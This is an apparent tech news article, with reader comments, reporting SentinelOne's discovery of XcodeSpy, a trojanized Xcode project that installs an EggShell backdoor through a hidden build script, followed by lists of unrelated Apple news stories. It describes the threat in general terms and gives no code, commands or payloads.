Security Researchers Discover XcodeSpy Malware That Targets Developers

Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).

iu 2 1
Xcode is software designed for developers who want to write apps for the iOS and macOS platforms, and the malicious project that's circulating mirrors TabBarInteraction, a legitimate open source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the malware includes a hidden "run Script" executable that downloads and installs the EggShell open source back door that's able to spy on users through the microphone, camera, and keyboard as well as upload and download files.

Two variants of the custom EggShell attack were found to be uploaded in Japan, first in August and then in October, so this is an attack that's been out in the wild for some time.

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.

SentinelOne says that all Apple Developers that use Xcode should exercise caution when using shared Xcode projects.

Tag: Xcode

Top Rated Comments

jonnysods Avatar
9 months ago
Get ready for lots of Justin Long Intel videos about this next week.
Score: 9 Votes (Like | Disagree)
Apple_Robert Avatar
9 months ago

Laughing on my Linux developer laptop.
What is so funny? It's not like Linux hasn't had Malware problems.
Score: 7 Votes (Like | Disagree)
I7guy Avatar
9 months ago
Comes under the heading, be very careful about what you download.
Score: 6 Votes (Like | Disagree)
hot-gril Avatar
9 months ago

Why is it being called a Trojan when it has to be actively installed?
Cause that's what trojans are.
Score: 5 Votes (Like | Disagree)
hot-gril Avatar
9 months ago

Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
Score: 4 Votes (Like | Disagree)
Unsupported Avatar
9 months ago

Why is it being called a Trojan when it has to be actively installed?
https://usa.kaspersky.com/resource-center/threats/trojans

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

•Deleting data
•Blocking data
•Modifying data
•Copying data
•Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
Score: 3 Votes (Like | Disagree)

Related Stories

wwdc 2021 details

WWDC is One Week Away: Five Steps to Get Ready

Monday May 31, 2021 11:16 am PDT by
We're just one week away from WWDC 2021, which kicks off next Monday, June 7 and runs through Friday, June 11. Apple's annual developers conference will be an all-digital affair for the second year in a row due to public health measures, but it will still be an exciting week, with Apple expected to unveil iOS 15 and other new software updates. Ahead of WWDC, we've put together five steps to...
wwdc 2021 details

Apple Highlights Winners of WWDC 2021 Swift Student Challenge

Tuesday June 1, 2021 5:13 am PDT by
Apple today highlighted some winners of this year's Swift Student Challenge, which gives young developers a chance to win special attire and apparel for the annual developer conference. This year, more than 350 winners from more than 35 countries around the world have been selected. Apple highlights a few developers who have won this year's challenge, including Abinaya Dinesh, who created...
airdrop logo

Researchers Discover AirDrop Security Flaw That Could Expose Personal Data to Strangers

Friday April 23, 2021 4:36 am PDT by
AirDrop is a feature that allows Apple devices to securely and conveniently transfer files, photos, and more between each other wirelessly. Users can share items with their own devices, friends, family, or even strangers. The convenience and ease of use, however, may be undermined by a newly discovered security flaw. Researchers at TU Darmstadt have discovered that the process which AirDrop...
apple wwdc app developer academy global stats

Apple Further Expands Developer Academy Program With First Detroit Applications Opening This Week

Wednesday May 12, 2021 5:39 am PDT by
Apple today released an update on the progress of the Apple Developer Academy program, ahead of applications for the new Detroit site opening this week. The Apple Developer Academy sets out to provide enrolled students with app development training and entrepreneurial skills. Apple offers two different training programs: 30-day foundation courses that cover specific topics, such as an...
Apple TV Ray Light 2 Triad

Apple Inks Deal for 'The Big Door Prize' From 'Schitt's Creek' Writer

Friday May 28, 2021 1:42 pm PDT by
Apple has won the rights to "The Big Door Prize," a half-hour comedy based on M.O. Walsh's bestselling novel of the same name, reports Deadline. Apple was involved in a bidding war for the series, winning out over multiple other bidders. The project, headed up by "Schitt's Creek" writer and executive producer David West Read, will consist of 10 half-hour episodes. Read is writing the...
homekit devices feature orange3

Apple-Backed 'Project CHIP' to Start Smart Home Device Certification in Late 2021

Friday April 16, 2021 8:55 am PDT by
In late 2019, Apple along with Amazon, Google, and the Zigbee Alliance announced plans to develop a universal standard for smart home products, leveraging existing protocols like Apple's HomeKit, Amazon's Alexa, and Google's Weave. The so-called "Project Connected Home over IP" or "Project CHIP" aims to make it easier for device manufacturers to build devices that are compatible with a...
watchOS 8 on Apple Watch feature

Apple Seeds First Beta of watchOS 8 to Developers

Monday June 7, 2021 12:04 pm PDT by
In addition to seeding the first betas of iOS 15, iPadOS 15, tvOS 15, and macOS 12, Apple has also seeded the first beta of the watchOS 8 update to developers for testing purposes. To install watchOS 8, developers will need to download the configuration profile from the Apple Developer Center. Once installed, watchOS 8 can be downloaded through the dedicated Apple Watch app on the iPhone by ...
14

iOS 14.5 to Make Zero-Click Attacks 'Significantly Harder'

Monday February 22, 2021 9:05 am PST by
Apple's impending iOS and iPadOS 14.5 update will make zero-click attacks considerably more difficult by extending PAC security provisions, according to Motherboard. Apple has made a change to the way in which it secures its code in the latest betas of iOS 14.5 and iPadOS 14.5 to make zero-click attacks much harder. The change, spotted by security researchers, has now been confirmed by...

Popular Stories

Mac Notebook Upgrade Program

Apple Introduces New MacBook Upgrade Program for Business Partners

Monday November 29, 2021 7:38 am PST by
In association with CIT as the financing partner, Apple has launched a new Mac Upgrade Program for small businesses and Apple business partners that allow companies to easily distribute and upgrade their fleets of MacBooks at an affordable price to all of their workers. As outlined on CIT's website, shared by Max Weinbach, Apple Business Partners can distribute the 13-inch MacBook Pro,...
General cyber monday 20 sale feature

Best Cyber Monday Deals for AirPods, Apple Pencil, iMac, More

Monday November 29, 2021 4:19 am PST by
With Black Friday over, Cyber Monday 2021 is now in full swing and you can find many of the same sales as last week on Apple products like AirPods, Apple Pencil, and iPad Pro. In this article we're focusing on the best Cyber Monday discounts on Apple products like these and more. Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we...
2017 apple tv

Cyber Monday: Original Apple TV 4K Drops to $99.99 for Amazon Prime Members

Monday November 29, 2021 12:01 pm PST by
We've been tracking Apple product and accessory deals for Cyber Monday 2021 today, and now Woot is offering a solid discount on the previous generation 32GB Apple TV 4K. You can get this device in new condition for just $99.99 if you're an Amazon Prime member. Note that this sale will last for one day only. Note: MacRumors is an affiliate partner with some of these vendors. When you click a...
iPhone SE Cosmopolitan Clean

New iPhone SE Reportedly on Track for Release in First Quarter of 2022

Tuesday November 30, 2021 8:08 am PST by
Apple plans to release a third-generation iPhone SE in the first quarter of 2022, according to Taiwanese research firm TrendForce. If this timeframe proves to be accurate, we can expect the device to be released by the end of March. As previously rumored, TrendForce said the new iPhone SE will remain a mid-range smartphone with added support for 5G:In terms of product development, Apple is...
maxresdefault

Five Features to Look Forward to in the 2022 MacBook Air

Tuesday November 30, 2021 1:51 pm PST by
In 2022, Apple is going to release an updated version of the MacBook Air with some of the biggest design changes that we've seen since 2010, when Apple introduced the 11 and 13-inch size options. In the video below, we highlight five features that you need to know about the new machine. Subscribe to the MacRumors YouTube channel for more videos. No More Wedge Design - Current MacBook...
telsa cyberwhistle

Elon Musk Urges Customers to Buy 'Tesla Cyberwhistle' Instead of Apple Polishing Cloth

Wednesday December 1, 2021 4:01 am PST by
Tesla CEO Elon Musk has encouraged customers to buy the "Cyberwhistle" for $50 instead of Apple's much-discussed Polishing Cloth. The product page, which Musk shared on Twitter on Tuesday evening, offers a limited edition stainless steel whistle with the same distinctive design of the Tesla Cybertruck:Inspired by Cybertruck, the limited-edition Cyberwhistle is a premium collectible made from ...
General cyber monday 20 sale feature 2

Best Cyber Monday Apple Accessory Deals Available Today

Monday November 29, 2021 6:41 am PST by
We started sharing deals on Apple products for Cyber Monday 2021 earlier today, and now we're tracking deals and bargains available from all of the best Apple accessory companies. Similar to Black Friday, you can expect Cyber Monday savings from Twelve South, Nomad, Belkin, Casetify, and many more. Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and...
iphone holiday

Best Black Friday iPhone Deals Still Available

Friday November 26, 2021 4:58 am PST by
Cellular carriers have always offered big savings on the newest iPhone models during the holidays, and Black Friday 2021 sales have now carried over into Cyber Monday as well. Right now we're tracking notable offers on the iPhone 13 and iPhone 13 Pro devices from AT&T, Verizon, and T-Mobile. For even more savings, keep an eye on older models like iPhone SE. Note: MacRumors is an affiliate...
airpods prototype translucent

Transparent AirPods and 29W Power Adapter Prototypes Surface in Photos

Tuesday November 30, 2021 7:16 am PST by
Images of transparent prototype AirPods and a 29W Apple power adapter have been shared on Twitter by Apple device collector Giulio Zompetti. The prototypes, which appear to be either first-generation or second-generation AirPods, feature clear plastic along the stem and around the outer side of the earbud, with the normal white plastic on the inner side of the earbud. Transparent casings are ...